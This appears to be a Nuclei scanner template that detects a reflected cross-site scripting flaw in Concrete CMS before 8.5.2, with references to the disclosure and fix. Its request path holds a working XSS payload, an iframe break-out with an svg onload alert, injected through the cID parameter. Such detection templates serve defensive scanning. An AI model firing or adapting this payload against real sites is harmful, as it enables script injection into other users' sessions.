id: concrete-xss

info:
  name: Unauthenticated reflected XSS in preview_as_user function
  author: shifacyclewla,hackergautam
  severity: medium
  description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
  reference:
    - https://hackerone.com/reports/643442
    - https://github.com/concrete5/concrete5/pull/7999
    - https://twitter.com/JacksonHHax/status/1389222207805661187
  tags: concrete,xss,cms

requests:
  - method: GET
    path:
      - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</iframe><svg/onload=alert("{{randstr}}")>'

      - type: word
        part: header
        words:
          - "text/html"
          - "CONCRETE5"
        condition: and

      - type: status
        status:
          - 200